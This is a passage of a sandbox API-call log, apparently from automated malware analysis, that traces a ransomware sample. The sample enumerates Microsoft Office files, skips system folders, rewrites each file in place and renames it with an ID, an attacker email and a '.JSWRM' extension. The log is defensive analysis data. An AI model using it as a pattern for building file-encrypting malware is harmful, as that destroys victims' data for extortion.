Office\\root\\mcxml\\en-us\\onenotemui.msi.16_onenotemui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\onenotemui.msi.16_onenotemui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0112.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0112.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0112.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.469] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9888767, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9888767, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9888767, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4cae, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="osmmui.msi.16_osmmui.mcxml", cAlternateFileName="OSMMUI~1.MCX")) returned 1 [0112.469] lstrcmpiW (lpString1="osmmui.msi.16_osmmui.mcxml", lpString2=".") returned 1 [0112.469] lstrcmpiW (lpString1="osmmui.msi.16_osmmui.mcxml", lpString2="..") returned 1 [0112.469] lstrcmpiW (lpString1="osmmui.msi.16_osmmui.mcxml", lpString2="...") returned 1 [0112.469] lstrcmpiW (lpString1="osmmui.msi.16_osmmui.mcxml", lpString2="windows") returned -1 [0112.469] lstrcmpiW (lpString1="osmmui.msi.16_osmmui.mcxml", lpString2="recovery") returned -1 [0112.469] lstrcmpiW (lpString1="osmmui.msi.16_osmmui.mcxml", lpString2="perflogs") returned -1 [0112.469] lstrcmpiW (lpString1="osmmui.msi.16_osmmui.mcxml", lpString2="documents and settings") returned 1 [0112.469] lstrcmpiW (lpString1="osmmui.msi.16_osmmui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.469] lstrcmpiW (lpString1="osmmui.msi.16_osmmui.mcxml", lpString2="system volume information") returned -1 [0112.469] lstrcmpiW (lpString1="osmmui.msi.16_osmmui.mcxml", lpString2="msocache") returned 1 [0112.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osmmui.msi.16_osmmui.mcxml", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0112.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0112.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osmmui.msi.16_osmmui.mcxml", cchWideChar=26, lpMultiByteStr=0x241060, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osmmui.msi.16_osmmui.mcxml", lpUsedDefaultChar=0x0) returned 26 [0112.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0112.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osmmui.msi.16_osmmui.mcxml", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0112.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0112.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osmmui.msi.16_osmmui.mcxml", cchWideChar=26, lpMultiByteStr=0x241100, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osmmui.msi.16_osmmui.mcxml", lpUsedDefaultChar=0x0) returned 26 [0112.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0112.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0112.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0112.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0112.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\osmmui.msi.16_osmmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\osmmui.msi.16_osmmui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.470] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19630) returned 1 [0112.470] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4ca0) returned 0x24c1d0 [0112.471] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4ca0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x4ca0, lpOverlapped=0x0) returned 1 [0112.473] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.473] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4ca0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x4ca0, lpOverlapped=0x0) returned 1 [0112.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.474] CloseHandle (hObject=0x238) returned 1 [0112.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0112.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0112.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0112.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0112.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0112.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0112.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.474] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\osmmui.msi.16_osmmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\osmmui.msi.16_osmmui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\osmmui.msi.16_osmmui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\osmmui.msi.16_osmmui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0112.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0112.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0112.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0112.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0112.475] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9862502, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9862502, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9888767, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x940a, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="osmuxmui.msi.16_osmuxmui.mcxml", cAlternateFileName="OSMUXM~1.MCX")) returned 1 [0112.475] lstrcmpiW (lpString1="osmuxmui.msi.16_osmuxmui.mcxml", lpString2=".") returned 1 [0112.475] lstrcmpiW (lpString1="osmuxmui.msi.16_osmuxmui.mcxml", lpString2="..") returned 1 [0112.475] lstrcmpiW (lpString1="osmuxmui.msi.16_osmuxmui.mcxml", lpString2="...") returned 1 [0112.475] lstrcmpiW (lpString1="osmuxmui.msi.16_osmuxmui.mcxml", lpString2="windows") returned -1 [0112.475] lstrcmpiW (lpString1="osmuxmui.msi.16_osmuxmui.mcxml", lpString2="recovery") returned -1 [0112.475] lstrcmpiW (lpString1="osmuxmui.msi.16_osmuxmui.mcxml", lpString2="perflogs") returned -1 [0112.475] lstrcmpiW (lpString1="osmuxmui.msi.16_osmuxmui.mcxml", lpString2="documents and settings") returned 1 [0112.475] lstrcmpiW (lpString1="osmuxmui.msi.16_osmuxmui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.475] lstrcmpiW (lpString1="osmuxmui.msi.16_osmuxmui.mcxml", lpString2="system volume information") returned -1 [0112.475] lstrcmpiW (lpString1="osmuxmui.msi.16_osmuxmui.mcxml", lpString2="msocache") returned 1 [0112.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osmuxmui.msi.16_osmuxmui.mcxml", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0112.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0112.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osmuxmui.msi.16_osmuxmui.mcxml", cchWideChar=30, lpMultiByteStr=0x241060, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osmuxmui.msi.16_osmuxmui.mcxml", lpUsedDefaultChar=0x0) returned 30 [0112.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0112.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osmuxmui.msi.16_osmuxmui.mcxml", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0112.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0112.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osmuxmui.msi.16_osmuxmui.mcxml", cchWideChar=30, lpMultiByteStr=0x241100, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osmuxmui.msi.16_osmuxmui.mcxml", lpUsedDefaultChar=0x0) returned 30 [0112.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0112.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0112.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0112.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0112.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\osmuxmui.msi.16_osmuxmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\osmuxmui.msi.16_osmuxmui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.476] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37898) returned 1 [0112.476] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9400) returned 0x24c1d0 [0112.477] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x9400, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x9400, lpOverlapped=0x0) returned 1 [0112.596] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.596] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x9400, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x9400, lpOverlapped=0x0) returned 1 [0112.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.597] CloseHandle (hObject=0x238) returned 1 [0112.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0112.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0112.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0112.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0112.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0112.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0112.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.598] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\osmuxmui.msi.16_osmuxmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\osmuxmui.msi.16_osmuxmui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\osmuxmui.msi.16_osmuxmui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\osmuxmui.msi.16_osmuxmui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0112.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0112.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0112.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0112.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0112.600] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x983c2c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x983c2c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99473dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x642ca, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="outlookmui.msi.16_outlookmui.mcxml", cAlternateFileName="OUTLOO~1.MCX")) returned 1 [0112.600] lstrcmpiW (lpString1="outlookmui.msi.16_outlookmui.mcxml", lpString2=".") returned 1 [0112.600] lstrcmpiW (lpString1="outlookmui.msi.16_outlookmui.mcxml", lpString2="..") returned 1 [0112.600] lstrcmpiW (lpString1="outlookmui.msi.16_outlookmui.mcxml", lpString2="...") returned 1 [0112.600] lstrcmpiW (lpString1="outlookmui.msi.16_outlookmui.mcxml", lpString2="windows") returned -1 [0112.600] lstrcmpiW (lpString1="outlookmui.msi.16_outlookmui.mcxml", lpString2="recovery") returned -1 [0112.600] lstrcmpiW (lpString1="outlookmui.msi.16_outlookmui.mcxml", lpString2="perflogs") returned -1 [0112.600] lstrcmpiW (lpString1="outlookmui.msi.16_outlookmui.mcxml", lpString2="documents and settings") returned 1 [0112.600] lstrcmpiW (lpString1="outlookmui.msi.16_outlookmui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.600] lstrcmpiW (lpString1="outlookmui.msi.16_outlookmui.mcxml", lpString2="system volume information") returned -1 [0112.600] lstrcmpiW (lpString1="outlookmui.msi.16_outlookmui.mcxml", lpString2="msocache") returned 1 [0112.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0112.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="outlookmui.msi.16_outlookmui.mcxml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0112.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="outlookmui.msi.16_outlookmui.mcxml", cchWideChar=34, lpMultiByteStr=0x22d0d8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlookmui.msi.16_outlookmui.mcxml", lpUsedDefaultChar=0x0) returned 34 [0112.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0112.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0112.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="outlookmui.msi.16_outlookmui.mcxml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0112.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="outlookmui.msi.16_outlookmui.mcxml", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlookmui.msi.16_outlookmui.mcxml", lpUsedDefaultChar=0x0) returned 34 [0112.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0112.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0112.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0112.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0112.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\outlookmui.msi.16_outlookmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\outlookmui.msi.16_outlookmui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.601] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=410314) returned 1 [0112.601] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0112.602] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0112.616] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.616] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0112.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.617] CloseHandle (hObject=0x238) returned 1 [0112.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0112.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0112.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0112.617] RtlAllocateHeap 